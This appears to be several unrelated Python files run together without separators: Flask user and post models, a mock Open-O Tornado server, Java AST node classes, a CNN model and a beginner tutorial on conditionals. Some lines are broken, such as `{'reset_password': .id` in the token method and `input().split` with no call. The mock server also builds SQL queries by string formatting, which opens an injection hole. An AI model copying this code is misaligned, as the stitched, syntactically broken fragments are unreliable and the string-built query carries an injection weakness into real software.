app import db, app from datetime import datetime from werkzeug.security import generate_password_hash, check_password_hash from flask_login import UserMixin from app import login from time import time import jwt @login.user_loader def load_user(id): return User.query.get(int(id)) followers = db.Table('followers', db.Column('follower_id', db.Integer, db.ForeignKey('user.id')), db.Column('followed_id', db.Integer, db.ForeignKey('user.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(64), index=True, unique=True) email = db.Column(db.String(128), index=True, unique=True) password_hash = db.Column(db.String(128)) posts = db.relationship('Post', backref='author', lazy='dynamic') about_me = db.Column(db.String(128)) last_seen = db.Column(db.DateTime, default=datetime.utcnow) followed = db.relationship( 'User', secondary=followers, primaryjoin=(followers.c.follower_id == id), secondaryjoin=(followers.c.followed_id == id), backref=db.backref('followers', lazy='dynamic'), lazy='dynamic') def __repr__(self): return ''.format(self.username) def set_password(self, password): self.password_hash = generate_password_hash(password) def check_password(self, password): return check_password_hash(self.password_hash, password) def follow(self, user): if not self.is_following(user): self.followed.append(user) def unfollow(self, user): if self.is_following(user): self.followed.remove(user) def is_following(self, user): ''' The is_following() method issues a query on the followed relationship to check if a link between two users already exists. You have seen me use the filter_by() method of the SQLAlchemy query object before, for example to find a user given its username. The filter() method that I'm using here is similar, but lower level, as it can include arbitrary filtering conditions, unlike filter_by() which can only check for equality to a constant value. The condition that I'm using in is_following() looks for items in the association table that have the left side foreign key set to the self user, and the right side set to the user argument. 
The query is terminated with a count() method, which returns the number of results. The result of this query is going to be 0 or 1, so checking for the count being 1 or greater than 0 is actually equivalent. Other query terminators you have seen me use in the past are all() and first(). ''' return self.followed.filter( followers.c.followed_id == user.id).count() > 0 def followed_posts(self): ''' Followed format: Post.query.join(...).filter(...).order_by(...) https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-viii-followers ''' followed = Post.query.join( followers, (followers.c.followed_id == Post.user_id)).filter( followers.c.follower_id == self.id) own = Post.query.filter_by(user_id=self.id) return followed.union(own).order_by(Post.timestamp.desc()) def get_reset_password_token(self, expires_in=600): return jwt.encode( {'reset_password': .id, 'exp': time() + expires_in}, app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8') @staticmethod def verify_reset_password_token(token): try: id = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])['reset_password'] except: return return User.query.get(id) class Post(db.Model): id = db.Column(db.Integer, primary_key=True) body = db.Column(db.String(256)) timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) def __repr__(self): return ''.format(self.body) PRASAD-DANGARE/PYTHON # Python Program To Add Two Numbers Using Arguments Parser(Integer,Float) ''' Function Name : Calculate Sum Of Two Numbers Using Argument Parser Function Date : 27 Aug 2020 Function Author : Input : Integer,Float Output : Float ''' from argparse import ArgumentParser # Create Argument Parser Class Object parser = ArgumentParser(description="This Program Calculate The Sum Of Two Numbers:") # Add Two Arguments With The Name n1 And n2 And Type As Float parser.add_argument("n1", type=float, help="input first number") parser.add_argument("n2",type=float, help="input second number") # Retrive The Arguments Passed To Program args = parser.parse_args() # Convert The n1 And n2 Value Into Float Type Then Add Them result = float(args.n1)+float(args.n2) print("Sum Of Two Numbers Are =", result) 1-10 import numpy arr = input().split() n, m, p = map(int, arr) list = [] for i in range(0, n + m): list.append([x for x in input().split]) print(numpy.array(list, int))from .base import PyObjectId from bson import ObjectId from pydantic import BaseModel, Field from typing import List class DbTestSet(BaseModel): id: PyObjectId = Field(alias="_id") name: str ids: List[PyObjectId] class Config: allow_population_by_field_name = True json_encoders = {ObjectId: str} schema_extra = { "example": {} } #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2016-2017 China Telecommunication Co., Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
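# --- Illustrative sketch of the followers query pattern (refers to the User model
# --- and its is_following()/followed_posts() docstrings further up; assumption:
# --- a plain sqlite3 stand-in is used here instead of the SQLAlchemy models, and
# --- only the table/column names are taken from those models).
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT);
    CREATE TABLE post (id INTEGER PRIMARY KEY, body TEXT, user_id INTEGER);
    CREATE TABLE followers (follower_id INTEGER, followed_id INTEGER);
    INSERT INTO user VALUES (1, 'alice'), (2, 'bob');
    INSERT INTO post VALUES (1, 'own post', 1), (2, 'followed post', 2);
    INSERT INTO followers VALUES (1, 2);  -- alice follows bob
""")

# followed_posts(): join the association table against Post.user_id to pick up
# posts of everyone the user follows, then UNION the user's own posts.
rows = con.execute("""
    SELECT post.body FROM post
    JOIN followers ON followers.followed_id = post.user_id
    WHERE followers.follower_id = ?
    UNION
    SELECT post.body FROM post WHERE post.user_id = ?
""", (1, 1)).fetchall()
print(sorted(r[0] for r in rows))  # ['followed post', 'own post']

# is_following(): count rows in the association table with the left-side key set
# to the current user and the right-side key set to the other user; > 0 == following.
count = con.execute(
    "SELECT COUNT(*) FROM followers WHERE follower_id = ? AND followed_id = ?",
    (1, 2)).fetchone()[0]
print(count > 0)  # True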
# __author__ = 'liyiqun' import tornado.httpserver import tornado.ioloop import tornado.options import tornado.web import json import re from db_util import mysql_utils from common import * import datetime from base_handler import base_handler class ms_handler(base_handler): def initialize(self): super(ms_handler, self).initialize() pass #For service register def post(self, dummy): ctnt = self.request.body print 'Fake Open-O: Received post \n' print str(ctnt) try: req = json.loads(str(ctnt)) except: self.write('Invalid Request') self.finish() sn = req['serviceName'] if sn not in self.application.service_entry: self.application.service_entry[sn] = req else: added = [] nodes = req['nodes'] for n in nodes: exists = 0 for ex in self.application.service_entry[sn]['nodes']: if ex['ip'] == n['ip'] and ex['port'] == n['port']: exists = 1 break pass if not exists: added.append(n) pass self.application.service_entry[sn]['nodes'] += added self.write('{}') self.finish() pass #For servcie query def get(self, input): serv = {} m = self.application.query_service_pat.match(input) if m and m.groups(): sn = m.groups()[0] if sn in self.application.service_entry: serv = self.application.service_entry[sn] print 'Fake Open-O service: Returned get \n' print(json.dumps(serv)) self.write(json.dumps(serv)) self.finish() pass class driver_handler(base_handler): def initialize(self): super(driver_handler, self).initialize() pass #For driver register def post(self, dummy): ctnt = self.request.body print 'Fake Open-O driver: Received post \n' print str(ctnt) try: req = json.loads(str(ctnt)) except: self.write('Invalid Request') self.finish() sn = req['driverInfo']['driverName'] if sn not in self.application.service_entry: self.application.service_entry[sn] = req else: added = [] services = req['driverInfo']['services'] for item in services: exists = 0 for ex in self.application.service_entry[sn]['driverInfo']['services']: if ex['service_url'] == item['service_url']: exists = 1 break pass if not exists: added.append(item) pass self.application.service_entry[sn]['driverInfo']['services'] += added self.write('{}') self.finish() pass #For driver query def get(self, input): serv = [ { "driverName": "sdno-driver-ct-te", "instanceID": "vnfm-0-1", "ip": "10.23.63.21", "port": "23456", "protocol": "http", "services": [ { "service_url":"/openoapi/sbi-l3vpn/v1", "support_sys":[ { "type":"Agile Controller-DCN", "version":"V100R002" }, { "type":"Agile Controller-DCN", "version":"V100R003" } ] }, { "service_url":"/openoapi/sbi-l2vpn/v1", "support_sys":[ { "type":"Agile Controller-DCN", "version":"V100R003" } ] } ] }] serv = [{"driverInfo": {"protocol": "REST", "instanceID": "sdno-driver-ct-te_ID", "ip": "127.0.0.1", "driverName": "sdno-driver-ct-te", "services": [{"support_sys": [{"version": "v1", "type": "ct_te_driver"}], "service_url": "/openoapi/sdno-driver-ct-te/v1/"}], "port": 8670}}] print 'Fake Open-O driver: Returned get \n' print(json.dumps(serv)) self.write(json.dumps(serv)) self.finish() pass class esr_handler(base_handler): def initialize(self): super(esr_handler, self).initialize() pass #For ers controller query def post(self, dummy): ctnt = self.request.body print 'Fake Open-O esr: Received post \n' print str(ctnt) try: req = json.loads(str(ctnt)) except: self.write('Invalid Request') self.finish() resp = {'driver_url':'', 'type':'', 'vendor':'ZTE', 'version':''} self.write(json.dumps(resp)) self.finish() pass def get(self, input): resp = { "sdnControllerId":"a6c42529-cd6b-4c01-b149-03eb54b20a03", "name":"sdn", 
"url":"http://10.74.151.13:8181", "userName":"admin", "password":"", "version":"v1.0", "vendor":"ZTE", "description":"", "protocol":"netconf", "productName":"", "type":"ODL", "createTime":"2016-07-18 12:22:53" } self.write(json.dumps(resp)) self.finish() pass class brs_handler(base_handler): def initialize(self): super(brs_handler, self).initialize() pass def get(self, input): resp = {} db = mysql_utils('topology') if input.startswith('managed-elements'): 'Get equipments' sql_txt = 'SELECT * FROM t_router' res = db.exec_sql(sql_txt) num = len(res) resp['totalNum'] = num eles = [] for e in res: one_me = {'id':str(e[0]), 'name':e[2],'ipAddress':e[4], 'community':e[5], 'x':e[7], 'y':e[8], 'manufacturer':e[6]} eles.append(one_me) pass resp['managedElements'] = eles elif input.startswith('logical-termination-points'): meid = input.split('=')[1] sql_txt = 'SELECT * FROM t_port where router_id=%s' % str(meid) res = db.exec_sql(sql_txt) num = len(res) resp['totalNum'] = num ports = [] for p in res: one_p = {'id':str(p[0]), 'name':p[4], 'portIndex':p[9], 'phyBW':p[5], 'macAddress':p[6], 'ipAddress':p[8], 'type':p[2] } ports.append(one_p) resp['logicalTerminationPoints'] = ports elif input.startswith('topological-links'): sql_txt = 'SELECT * FROM t_link' res = db.exec_sql(sql_txt) num = len(res) resp['totalNum'] = num lks = [] for lk in res: one_lk = {'id':str(lk[0]), 'aEnd':str(lk[1]), 'zEnd':str(lk[2]), 'phyBW':lk[4]} lks.append(one_lk) resp['topologicalLinks'] = lks pass self.write(json.dumps(resp)) self.finish() pass class openo_app(tornado.web.Application): def __init__(self): handlers = [ (r'/openoapi/microservices/v1/services(.*)', ms_handler), (r'/openoapi/sdno-brs/v1/(.*)', brs_handler), (r'/openoapi/extsys/v1/sdncontrollers(.*)', esr_handler), (r'/openoapi/drivermgr/v1/drivers(.*)', driver_handler) ] self.service_entry = {} self.query_service_pat = re.compile(r'/(.+?)/version/(.+)') tornado.web.Application.__init__(self, handlers) pass if __name__ == '__main__': app = openo_app() server = tornado.httpserver.HTTPServer(app) server.listen(8086) tornado.ioloop.IOLoop.instance().start() import argparse import sys import colibris class BaseCommand: PROG = None USAGE = None DESCRIPTION = None EPILOG = None ADD_HELP = True def __init__(self, args): self.args = args self.parser = self.make_argument_parser() self.add_arguments(self.parser) self.initialize() def initialize(self): colibris.setup() def run(self): options = self.parse_arguments(self.parser, self.args) return self.execute(options) def make_argument_parser(self): return argparse.ArgumentParser(prog=self.PROG or self.make_prog(), usage=self.USAGE, description=self.DESCRIPTION, epilog=self.EPILOG, add_help=self.ADD_HELP) def make_prog(self): return '{arg0} {cmd}'.format(arg0=sys.argv[0], cmd=self.get_name()) def add_arguments(self, parser): pass def parse_arguments(self, parser, args): return parser.parse_args(args) def execute(self, options): raise NotImplementedError @classmethod def get_name(cls): return cls.__name__[0:-7].lower() from typing import ( final, List, Type, TypeVar, TYPE_CHECKING, ) from xoa_driver.internals.core.commands import ( P4G_INDICES, P4G_CREATE, P4G_DELETE, P4G_ENABLE, P4G_COMMENT, P4G_CLEAR_COUNTERS, P4G_ROLE, P4G_LP_TIME_SCALE, P4G_LP_SHAPE, P4G_TEST_APPLICATION, P4G_L4_PROTOCOL, ) if TYPE_CHECKING: from xoa_driver.internals.core import interfaces as itf from xoa_driver.internals.utils import kind from xoa_driver.internals.utils.indices import observer as idx_obs from .tls import GTls from .l2 import GL2 from 
.raw import GRaw from .tcp import GTcp from .udp import GUdp from .replay import GReplay from .l3 import GL3 from .user_state import GUserState from .histogram import GHistogram from ..base_index import BaseIndex class GCounters: def __init__(self, conn: "itf.IConnection", module_id: int, port_id: int, group_idx: int) -> None: self.clear = P4G_CLEAR_COUNTERS(conn, module_id, port_id, group_idx) class GLoadProfile: def __init__(self, conn: "itf.IConnection", module_id: int, port_id: int, group_idx: int) -> None: self.time_scale = P4G_LP_TIME_SCALE(conn, module_id, port_id, group_idx) self.shape = P4G_LP_SHAPE(conn, module_id, port_id, group_idx) CG = TypeVar("CG") @final class ConnectionGroupIdx(BaseIndex): """L47 Connection Group Index Manager""" def __init__(self, conn: "itf.IConnection", kind: "kind.IndicesKind", observer: "idx_obs.IndicesObserver") -> None: super().__init__(conn, kind, observer) self.comment = P4G_COMMENT(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_COMMENT` """ self.status = P4G_ENABLE(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_ENABLE` """ self.role = P4G_ROLE(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_ROLE` """ self.layer4_protocol = P4G_L4_PROTOCOL(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_L4_PROTOCOL` """ self.test_application = P4G_TEST_APPLICATION(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_TEST_APPLICATION` """ self.tls = GTls(self._conn, *kind) """TLS configurations.""" self.l2 = GL2(self._conn, *kind) """L2 configurations.""" self.raw = GRaw(self._conn, *kind) """Raw configurations.""" self.tcp = GTcp(self._conn, *kind) """TCP configurations.""" self.udp = GUdp(self._conn, *kind) """UDP configurations.""" self.replay = GReplay(self._conn, *kind) """Replay configurations.""" self.l3 = GL3(self._conn, *kind) """L3 configurations.""" self.user_state = GUserState(self._conn, *kind) """User state configurations.""" self.histogram = GHistogram(self._conn, *kind) """Histogram configurations.""" self.counters = GCounters(self._conn, *kind) """Counters.""" self.load_profile = GLoadProfile(self._conn, *kind) """Load Profile configurations.""" async def delete(self): await P4G_DELETE(self._conn, *self.kind).set() self._observer.notify(idx_obs.IndexEvents.DEL, self) @classmethod async def _fetch(cls, conn: "itf.IConnection", module_id: int, port_id: int) -> List[int]: resp = await P4G_INDICES(conn, module_id, port_id).get() return list(resp.group_identifiers) @classmethod async def _new(cls: Type[CG], conn: "itf.IConnection", kind: "kind.IndicesKind", observer: "idx_obs.IndicesObserver") -> CG: await P4G_CREATE(conn, *kind).set() return cls(conn, kind, observer) from inputs.classes import TflInput from components.digraphs import TemporalDiGraph from plots.plotter import Plotter from plots.circle import Circle from plots.slice import Slice from algorithms.foremost import calculate_foremost_tree tube_input = TflInput(['victoria', 'bakerloo'], ['1600']) tube = TemporalDiGraph('TubeNetwork', data=tube_input) tube.details() # plotter = Plotter() # plotter.single(Slice, tube, slider=False) # plotter.single(Circle, calculate_foremost_tree(tube, 'Holborn')) # plotter.single(Slice, calculate_foremost_tree(tube, 'Holborn')) input("Press enter key to exit...") from ast import Node # 
------------------------------------------------------------------------------ class CompilationUnit(Node): attrs = ("package", "imports", "types") class Import(Node): attrs = ("path", "static", "wildcard") class Documented(Node): attrs = ("documentation",) class Declaration(Node): attrs = ("modifiers", "annotations") class TypeDeclaration(Declaration, Documented): attrs = ("name", "body") @property def fields(self): return [decl for decl in self.body if isinstance(decl, FieldDeclaration)] @property def methods(self): return [decl for decl in self.body if isinstance(decl, MethodDeclaration)] @property def constructors(self): return [decl for decl in self.body if isinstance(decl, ConstructorDeclaration)] class PackageDeclaration(Declaration, Documented): attrs = ("name",) class ClassDeclaration(TypeDeclaration): attrs = ("type_parameters", "extends", "implements") class EnumDeclaration(TypeDeclaration): attrs = ("implements",) class InterfaceDeclaration(TypeDeclaration): attrs = ("type_parameters", "extends",) class AnnotationDeclaration(TypeDeclaration): attrs = () # ------------------------------------------------------------------------------ class Type(Node): attrs = ("name", "dimensions",) class BasicType(Type): attrs = () class ReferenceType(Type): attrs = ("arguments", "sub_type") class TypeArgument(Node): attrs = ("type", "pattern_type") # ------------------------------------------------------------------------------ class TypeParameter(Node): attrs = ("name", "extends") # ------------------------------------------------------------------------------ class Annotation(Node): attrs = ("name", "element") class ElementValuePair(Node): attrs = ("name", "value") class ElementArrayValue(Node): attrs = ("values",) # ------------------------------------------------------------------------------ class Member(Documented): attrs = () class MethodDeclaration(Member, Declaration): attrs = ("type_parameters", "return_type", "name", "parameters", "throws", "body") class FieldDeclaration(Member, Declaration): attrs = ("type", "declarators") class ConstructorDeclaration(Declaration, Documented): attrs = ("type_parameters", "name", "parameters", "throws", "body") # ------------------------------------------------------------------------------ class ConstantDeclaration(FieldDeclaration): attrs = () class ArrayInitializer(Node): attrs = ("initializers",) class VariableDeclaration(Declaration): attrs = ("type", "declarators") class LocalVariableDeclaration(VariableDeclaration): attrs = () class VariableDeclarator(Node): attrs = ("name", "dimensions", "initializer") class FormalParameter(Declaration): attrs = ("type", "name", "varargs") class InferredFormalParameter(Node): attrs = ('name',) # ------------------------------------------------------------------------------ class Statement(Node): attrs = ("label",) class IfStatement(Statement): attrs = ("condition", "then_statement", "else_statement") class WhileStatement(Statement): attrs = ("condition", "body") class DoStatement(Statement): attrs = ("condition", "body") class ForStatement(Statement): attrs = ("control", "body") class AssertStatement(Statement): attrs = ("condition", "value") class BreakStatement(Statement): attrs = ("goto",) class ContinueStatement(Statement): attrs = ("goto",) class ReturnStatement(Statement): attrs = ("expression",) class ThrowStatement(Statement): attrs = ("expression",) class SynchronizedStatement(Statement): attrs = ("lock", "block") class TryStatement(Statement): attrs = ("resources", "block", "catches", 
"finally_block") class SwitchStatement(Statement): attrs = ("expression", "cases") class BlockStatement(Statement): attrs = ("statements",) class StatementExpression(Statement): attrs = ("expression",) # ------------------------------------------------------------------------------ class TryResource(Declaration): attrs = ("type", "name", "value") class CatchClause(Statement): attrs = ("parameter", "block") class CatchClauseParameter(Declaration): attrs = ("types", "name") # ------------------------------------------------------------------------------ class SwitchStatementCase(Node): attrs = ("case", "statements") class ForControl(Node): attrs = ("init", "condition", "update") class EnhancedForControl(Node): attrs = ("var", "iterable") # ------------------------------------------------------------------------------ class Expression(Node): attrs = () class Assignment(Expression): attrs = ("expressionl", "value", "type") class TernaryExpression(Expression): attrs = ("condition", "if_true", "if_false") class BinaryOperation(Expression): attrs = ("operator", "operandl", "operandr") class Cast(Expression): attrs = ("type", "expression") class MethodReference(Expression): attrs = ("expression", "method", "type_arguments") class LambdaExpression(Expression): attrs = ('parameters', 'body') # ------------------------------------------------------------------------------ class Primary(Expression): attrs = ("prefix_operations", "postfix_operations", "qualifier", "selectors") class Literal(Primary): attrs = ("value",) class This(Primary): attrs = () class MemberReference(Primary): attrs = ("member",) class Invocation(Primary): attrs = ("type_arguments", "arguments") class ExplicitConstructorInvocation(Invocation): attrs = () class SuperConstructorInvocation(Invocation): attrs = () class MethodInvocation(Invocation): attrs = ("member",) class SuperMethodInvocation(Invocation): attrs = ("member",) class SuperMemberReference(Primary): attrs = ("member",) class ArraySelector(Expression): attrs = ("index",) class ClassReference(Primary): attrs = ("type",) class VoidClassReference(ClassReference): attrs = () # ------------------------------------------------------------------------------ class Creator(Primary): attrs = ("type",) class ArrayCreator(Creator): attrs = ("dimensions", "initializer") class ClassCreator(Creator): attrs = ("constructor_type_arguments", "arguments", "body") class InnerClassCreator(Creator): attrs = ("constructor_type_arguments", "arguments", "body") # ------------------------------------------------------------------------------ class EnumBody(Node): attrs = ("constants", "declarations") class EnumConstantDeclaration(Declaration, Documented): attrs = ("name", "arguments", "body") class AnnotationMethod(Declaration): attrs = ("name", "return_type", "dimensions", "default") Hackerrank/Project Euler - Python/euler006.py0 #!/bin/python3 """ Author: e-mail: website: https://rishabhrkaushik.github.io Purpose: This is part of the series to the solution to Project Euler. 
Problem Statement: https://www.hackerrank.com/contests/projecteuler/challenges/euler006/problem """ import sys t = int(input().strip()) for a0 in range(t): n = int(input().strip()) # sum of first n natural number squared - sum of square of first n natural number diff = (n*(n+1)/2)**2 - ((n**3)/3 + (n**2)/2 + (n/6)) print(int(diff)) from JumpScale import j import time OsisBaseObject=j.core.osis.getOsisBaseObjectClass() class Alert(OsisBaseObject): """ alert object history = [{'user':'hamdy', 'state':'ACCEPTED', 'epoch':123, 'comment':''}, {'user':'hamdy', 'state':'RESOLVED', 'epoch':123, 'comment':''}] """ ALLOWED_STATES = ["NEW","ALERT", 'ACCEPTED', 'RESOLVED', 'UNRESOLVED', 'CLOSED'] def __init__(self, ddict={}, gid=0, nid=0, guid="", aid=0, jid=0, masterjid=0, epoch=0, errormessage="", errormessagePub="", description="", descriptionpub="", level=1, category="", tags="", inittime=0,#first time there was an error condition linked to this alert lasttime=0,#last time there was an error condition linked to this alert closetime=-1,#alert is closed, no longer active transactionsinfo="", slabreach=0, history=[], state='NEW', assigned_user=None, eco=None): self.guid = None if ddict <> {}: self.load(ddict) else: if guid=="": self.guid=j.base.idgenerator.generateGUID() else: self.guid=guid self.id = self.guid self.gid = gid self.nid = nid self.description=description self.descriptionpub=descriptionpub self.level=level #1:critical, 2:warning, 3:info self.category=category #dot notation e.g. machine.start.failed self.tags=tags #e.g. machine:2323 self.inittime = inittime #first time there was an error condition linked to this alert self.lasttime = lasttime #last time there was an error condition linked to this alert self.closetime= closetime #alert is closed, no longer active self.nrerrorconditions=1 #nr of times this error condition happened self.errorconditions=[] #ids of errorconditions self.assigned_user = assigned_user self.update_state(state) #["NEW","ALERT", 'ACCEPTED', 'RESOLVED', 'UNRESOLVED', 'CLOSED'] self.lasttime=0 #last time there was an error condition linked to this alert self.closetime=0 #alert is closed, no longer active self.occurrences=1 #nr of times this error condition happened self.slabrach = slabreach self.history = history self.eco = eco self.aid = aid self.jid = jid self.masterjid = masterjid self.epoch = epoch self.errormessage = errormessage self.errormessagePub = errormessagePub def _check_state(self, state): if not state in self.ALLOWED_STATES: raise RuntimeError('Invalid state -- allowed states are %s' % self.ALLOWED_STATES) def _check_history_item(self, history_item): for item in ['user', 'state', 'epoch', 'comment']: if not item in history_item: raise RuntimeError('Invalid history item -- missing %s' % item) def update_state(self, state): self._check_state(state) self.state = state self.epoch = time.time() def update_history(self, history_item): self._check_history_item(history_item) self.history.insert(0, history_item) self.assigned_user = history_item['user'] self.epoch = time.time() def pprint_history(self): import pprint pp = pprint.PrettyPrinter(indent=4) pp.pprint(self.history) def getSetGuid(self): """ use osis to define & set unique guid (sometimes also id) """ if not self.guid: self.guid = j.base.idgenerator.generateGUID() self.id = self.guid return self.guid A=5 B=' ' C=B.index('m') print(C) print(B[0]) print("Heloo ")''' Convolutional Neural Network for Fashion Landmarks Detection. 
for COMP592 Project due 20th of April ''' import tensorflow.compat.v1 as tf class LandmarkModel(object): def __init__(self, output_size): self.output_size = output_size def __call__(self, input_tensor): # |== Layer 0: input layer ==| # Input feature x should be of shape (batch_size, image_width, image_height, color_channels). inputs = tf.cast(input_tensor, tf.float32) # |== Layer 1 ==| with tf.variable_scope('layer1'): # Convolutional layer # Computes 32 features using a 3x3 filter with ReLU activation. conv1 = tf.layers.conv2d(inputs=inputs, filters=32, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=(2, 2), padding='SAME') # |== Layer 2 ==| with tf.variable_scope('layer2'): conv2 = tf.layers.conv2d(inputs=pool1, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) conv3 = tf.layers.conv2d(inputs=conv2, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool2 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[2, 2], strides=(2, 2), padding='SAME') # |== Layer 3 ==| with tf.variable_scope('layer3'): conv4 = tf.layers.conv2d(inputs=pool2, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) conv5 = tf.layers.conv2d(inputs=conv4, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool3 = tf.layers.max_pooling2d(inputs=conv5, pool_size=[2, 2], strides=(2, 2), padding='SAME') # |== Layer 4 ==| with tf.variable_scope('layer4'): conv6 = tf.layers.conv2d(inputs=pool3, filters=128, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) conv7 = tf.layers.conv2d(inputs=conv6, filters=128, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool4 = tf.layers.max_pooling2d(inputs=conv7, pool_size=[2, 2], strides=(1, 1), padding='SAME') # |== Layer 5 ==| with tf.variable_scope('layer5'): conv8 = tf.layers.conv2d(inputs=pool4, filters=256, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) # |== Layer 6 ==| with tf.variable_scope('layer6'): # Flatten tensor into a batch of vectors flatten = tf.layers.flatten(inputs=conv8) dense1 = tf.layers.dense(inputs=flatten, units=1024, activation=tf.nn.relu, use_bias=True) logits = tf.layers.dense(inputs=dense1, units=self.output_size, activation=None, use_bias=True, name="logits") logits = tf.identity(logits, 'final_dense') return logits """ Day 2: Boolean variables, conditionals, control structures, loops """ int_var = 1 frac_var = 2.333333 string_var = "Hello class hope you are doing well!" print(int_var) print(frac_var) print(string_var) ''' Boolean variables/ bool They can only have one of 2 values True or False Logical operators and operator or operator xor operator not operator binary and unary operators Binary operator - works on 2 operand Unary operator - works on 1 operand logical_operator - boolean expression which gives boolean value ''' bool_var_1 = True bool_var_2 = False print(bool_var_1) print(bool_var_2) # == - equality operator, it is a binary operator. 
checks if the value on both sides are equal print(1 == 2) print(1 == 1) var_1 = 2.4 var_2 = 2.4 print(var_1 == var_2) # > - greater than operator - checks if the value on LHS is greater than RHS # < - less than operator - checks if the value on LSH is less than RHS var_1 = 2.4 var_2 = 2.4 print(var_1 > var_2) var_1 = 2.44 var_2 = 2.46 print(var_1 < var_2) # >= - greater than or equal to operator - checks if the value on LHS is greater than or equal to RHS # <= - less than or equal to operator - checks if the value on LSH is less than or equal to RHS var_1 = 123 var_2 = 123 print(var_1 >= var_2) var_1 = 456 var_2 = 789 print(var_1 <= var_2) # not operator - logical not. flips the boolean value expression_1 = 123 == 123 print(not expression_1) # '!' equals operator - checks if one value is not equal to the other expression_1 = 123 != 123 expression_2 = not(123 == 123) print("exp_1 ", expression_1) print("exp_2 ", expression_2) # and operator - True only if LHS and RHS are true, else results in false print("----------------------------------------") expression_1 = True and True print(expression_1) expression_1 = False and True print(expression_1) expression_1 = True and False print(expression_1) expression_1 = False and False print(expression_1) print("----------------------------------------") # or operator - True if either values are true. Only false when both are false print("----------------------------------------") expression_1 = True or True print(expression_1) expression_1 = False or True print(expression_1) expression_1 = True or False print(expression_1) expression_1 = False or False print(expression_1) print("----------------------------------------") print("----------------------------------------") def test(): print("I was called") return 1 == 1 print("----------------------------------------") print("----------------------------------------") # short circuit operators - and & or print("Short circuit happens here------------------------") expression_1 = False and test() print(expression_1) expression_1 = True or test() print(expression_1) print("Short circuit DOES NOT happen here------------------------") expression_1 = True and test() print(expression_1) expression_1 = False or test() print(expression_1) print("----------------------------------------") # xor operator ^ print("----------------------------------------") expression_1 = True ^ True print(expression_1) expression_1 = False ^ True print(expression_1) expression_1 = True ^ False print(expression_1) expression_1 = False ^ False print(expression_1) print("----------------------------------------") ''' Decision making - basically is that you want to control the flow of your code Primary - if else or if elif else if : print() ''' if False: print("Condition was true") print("Another statement") print("----------------------------------------") if True: print("Inside the if block") else: print("Inside the else block") print("----------------------------------------") # example of odd even numbers num = 11 if num % 2 == 0: print("Number is even") else: print("Number is odd") print("----------------------------------------") # if-elif ladder ''' ''' titanic_available = False tanhaji_available = True two_states_available = True spiderman_available = True golmaal_available = True if titanic_available: print("Tickets for titanic are available") elif tanhaji_available: print("Tickets for tanhaji are available") elif two_states_available: print("Tickets for two_states are available") elif spiderman_available: print("Tickets for 
spiderman are available") elif golmaal_available: print("Tickets for golmaal are available") else: print("No tickets are available") print("----------------------------------------") if titanic_available: print("Tickets for titanic are available") if tanhaji_available: print("Tickets for tanhaji are available") if two_states_available: print("Tickets for two_states are available") if spiderman_available: print("Tickets for spiderman are available") if golmaal_available: print("Tickets for golmaal are available") else: print("No tickets are available") print("----------------------------------------") # Nested if else td_available = True if titanic_available: if td_available: print("Titanic is available in 3d") else: print("Titanic is available, but not in 3d") else: print("Titanic is not available") if titanic_available or tanhaji_available: print("Booking a ticket for a movie") else: print("Did not find tickets for desired movie") # example of logical operator chaining if tanhaji_available or golmaal_available or spiderman_available: print("Booking a ticket for a movie") else: print("Did not find tickets for desired movie") print("----------------------------------------") # BODMAS or PEDMAS ''' B- brackets O - of Div/Mult - similar hierarchy Add/Sub - similar hierarchy ''' print(5 * 2 + 8) print(5 * (2 + 8)) rice_available = True spices_available = False chicken_available = True lamb_available = False peas_available = True carrots_available = True mushrooms_available = True # chaining of logical operators and use of brackets for grouping expressions if (rice_available and spices_available and ( ( chicken_available or lamb_available or ( peas_available and carrots_available and mushrooms_available ) ) ) ): print("Biryani can be made") else: print("Biryani can not be made") print("----------------------------------------") ''' Loops - what are they? 
